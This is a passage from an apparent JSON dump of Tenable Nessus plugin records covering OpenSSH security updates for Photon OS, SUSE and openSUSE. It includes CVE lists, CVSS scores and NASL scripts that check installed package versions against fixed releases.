script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 2.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"openssh-7.5p1-14.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"openssh-clients-7.5p1-14.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"openssh-debuginfo-7.5p1-14.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"openssh-server-7.5p1-14.ph2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 
\"openssh\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-01T01:09:17", "description": "An update of the openssh package has been released.", "edition": 17, "cvss3": {"score": 8.6, "vector": "AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2019-06-25T00:00:00", "title": "Photon OS 1.0: Openssh PHSA-2019-1.0-0237", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-12735", "CVE-2019-6110"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:openssh", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2019-1_0-0237_OPENSSH.NASL", "href": "https://www.tenable.com/plugins/nessus/126199", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2019-1.0-0237. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(126199);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/06/26 10:34:07\");\n\n script_cve_id(\"CVE-2019-6110\");\n script_bugtraq_id(106358);\n\n script_name(english:\"Photon OS 1.0: Openssh PHSA-2019-1.0-0237\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the openssh package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-1.0-237.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n 
script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-12735\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/12/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"openssh-7.4p1-10.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"openssh-debuginfo-7.4p1-10.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-14T06:16:53", "description": "This update for openssh fixes the following issues :\n\nSecurity issue fixed :\n\nCVE-2018-20685: Fixed an issue where scp client allows remote SSH\nservers to bypass intended access restrictions (bsc#1121571)\n\nCVE-2019-6109: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to manipulate terminal output via the\nobject name, e.g. 
by inserting ANSI escape sequences (bsc#1121816)\n\nCVE-2019-6110: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to manipulate stderr output, e.g. by\ninserting ANSI escape sequences (bsc#1121818)\n\nCVE-2019-6111: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to execute directory traversal attacks\nand overwrite files (bsc#1121821)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "published": "2019-01-22T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : openssh (SUSE-SU-2019:0132-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-20685", "CVE-2019-6109", "CVE-2019-6110", "CVE-2019-6111"], "modified": "2019-01-22T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:openssh", "p-cpe:/a:novell:suse_linux:openssh-askpass-gnome", "p-cpe:/a:novell:suse_linux:openssh-askpass-gnome-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-helpers-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-helpers", "p-cpe:/a:novell:suse_linux:openssh-debuginfo", "p-cpe:/a:novell:suse_linux:openssh-fips", "p-cpe:/a:novell:suse_linux:openssh-debugsource"], "id": "SUSE_SU-2019-0132-1.NASL", "href": "https://www.tenable.com/plugins/nessus/121300", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:0132-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121300);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/13\");\n\n script_cve_id(\"CVE-2018-20685\", 
\"CVE-2019-6109\", \"CVE-2019-6110\", \"CVE-2019-6111\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : openssh (SUSE-SU-2019:0132-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for openssh fixes the following issues :\n\nSecurity issue fixed :\n\nCVE-2018-20685: Fixed an issue where scp client allows remote SSH\nservers to bypass intended access restrictions (bsc#1121571)\n\nCVE-2019-6109: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to manipulate terminal output via the\nobject name, e.g. by inserting ANSI escape sequences (bsc#1121816)\n\nCVE-2019-6110: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to manipulate stderr output, e.g. by\ninserting ANSI escape sequences (bsc#1121818)\n\nCVE-2019-6111: Fixed an issue where the scp client would allow\nmalicious remote SSH servers to execute directory traversal attacks\nand overwrite files (bsc#1121821)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121571\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121816\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121818\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121821\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-20685/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6109/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6110/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6111/\"\n );\n # https://www.suse.com/support/update/announcement/2019/suse-su-20190132-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2f3bb078\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 7:zypper in -t patch\nSUSE-OpenStack-Cloud-7-2019-132=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2:zypper in -t patch\nSUSE-SLE-SAP-12-SP2-2019-132=1\n\nSUSE Linux Enterprise Server 12-SP4:zypper in -t patch\nSUSE-SLE-SERVER-12-SP4-2019-132=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2019-132=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2019-132=1\n\nSUSE Linux Enterprise Server 
12-SP2-BCL:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-BCL-2019-132=1\n\nSUSE Linux Enterprise Desktop 12-SP4:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP4-2019-132=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2019-132=1\n\nSUSE Enterprise Storage 4:zypper in -t patch SUSE-Storage-4-2019-132=1\n\nSUSE CaaS Platform ALL :\n\nTo install this update, use the SUSE CaaS Platform Velum dashboard. It\nwill inform you if it detects new updates and let you then trigger\nupdating of the complete cluster in a controlled way.\n\nSUSE CaaS Platform 3.0 :\n\nTo install this update, use the SUSE CaaS Platform Velum dashboard. It\nwill inform you if it detects new updates and let you then trigger\nupdating of the complete cluster in a controlled way.\n\nOpenStack Cloud Magnum Orchestration 7:zypper in -t patch\nSUSE-OpenStack-Cloud-Magnum-Orchestration-7-2019-132=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-6111\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:openssh-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-fips\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2|3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2/3/4\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP3/4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"openssh-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"openssh-askpass-gnome-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"openssh-askpass-gnome-debuginfo-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"openssh-debuginfo-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"openssh-debugsource-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"openssh-fips-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"openssh-helpers-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"openssh-helpers-debuginfo-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"openssh-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"openssh-askpass-gnome-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"openssh-askpass-gnome-debuginfo-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", 
reference:\"openssh-debuginfo-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"openssh-debugsource-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"openssh-fips-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"openssh-helpers-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"openssh-helpers-debuginfo-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"openssh-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"openssh-askpass-gnome-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"openssh-askpass-gnome-debuginfo-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"openssh-debuginfo-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"openssh-debugsource-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"openssh-fips-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"openssh-helpers-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"openssh-helpers-debuginfo-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"openssh-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"openssh-askpass-gnome-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"openssh-askpass-gnome-debuginfo-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"openssh-debuginfo-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"openssh-debugsource-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"openssh-helpers-7.2p2-74.35.1\")) flag++;\nif 
(rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"openssh-helpers-debuginfo-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"openssh-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"openssh-askpass-gnome-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"openssh-askpass-gnome-debuginfo-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"openssh-debuginfo-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"openssh-debugsource-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"openssh-helpers-7.2p2-74.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"openssh-helpers-debuginfo-7.2p2-74.35.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-20T12:54:32", "description": "This update for openssh fixes the following issues :\n\nSecurity issue fixed :\n\n - CVE-2018-20685: Fixed an issue where scp client allows\n remote SSH servers to bypass intended access\n restrictions (bsc#1121571)\n\n - CVE-2019-6109: Fixed an issue where the scp client would\n allow malicious remote SSH servers to manipulate\n terminal output via the object name, e.g. by inserting\n ANSI escape sequences (bsc#1121816)\n\n - CVE-2019-6110: Fixed an issue where the scp client would\n allow malicious remote SSH servers to manipulate stderr\n output, e.g. 
by inserting ANSI escape sequences\n (bsc#1121818)\n\n - CVE-2019-6111: Fixed an issue where the scp client would\n allow malicious remote SSH servers to execute directory\n traversal attacks and overwrite files (bsc#1121821)\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.", "edition": 13, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"}, "published": "2019-01-30T00:00:00", "title": "openSUSE Security Update : openssh (openSUSE-2019-93)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-20685", "CVE-2019-6109", "CVE-2019-6110", "CVE-2019-6111"], "modified": "2019-01-30T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:openssh-askpass-gnome-debuginfo", "p-cpe:/a:novell:opensuse:openssh-cavs-debuginfo", "p-cpe:/a:novell:opensuse:openssh-askpass-gnome", "p-cpe:/a:novell:opensuse:openssh-debuginfo", "p-cpe:/a:novell:opensuse:openssh", "p-cpe:/a:novell:opensuse:openssh-debugsource", "p-cpe:/a:novell:opensuse:openssh-helpers", "p-cpe:/a:novell:opensuse:openssh-cavs", "p-cpe:/a:novell:opensuse:openssh-helpers-debuginfo", "cpe:/o:novell:opensuse:42.3", "p-cpe:/a:novell:opensuse:openssh-fips"], "id": "OPENSUSE-2019-93.NASL", "href": "https://www.tenable.com/plugins/nessus/121460", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-93.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(121460);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-20685\", \"CVE-2019-6109\", \"CVE-2019-6110\", \"CVE-2019-6111\");\n\n script_name(english:\"openSUSE Security Update : openssh (openSUSE-2019-93)\");\n script_summary(english:\"Check for the openSUSE-2019-93 
patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for openssh fixes the following issues :\n\nSecurity issue fixed :\n\n - CVE-2018-20685: Fixed an issue where scp client allows\n remote SSH servers to bypass intended access\n restrictions (bsc#1121571)\n\n - CVE-2019-6109: Fixed an issue where the scp client would\n allow malicious remote SSH servers to manipulate\n terminal output via the object name, e.g. by inserting\n ANSI escape sequences (bsc#1121816)\n\n - CVE-2019-6110: Fixed an issue where the scp client would\n allow malicious remote SSH servers to manipulate stderr\n output, e.g. by inserting ANSI escape sequences\n (bsc#1121818)\n\n - CVE-2019-6111: Fixed an issue where the scp client would\n allow malicious remote SSH servers to execute directory\n traversal attacks and overwrite files (bsc#1121821)\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1121571\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1121816\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1121818\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1121821\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssh packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", 
value:\"CVE-2019-6111\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-askpass-gnome-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-cavs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-cavs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-fips\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:openssh-helpers-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/01/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
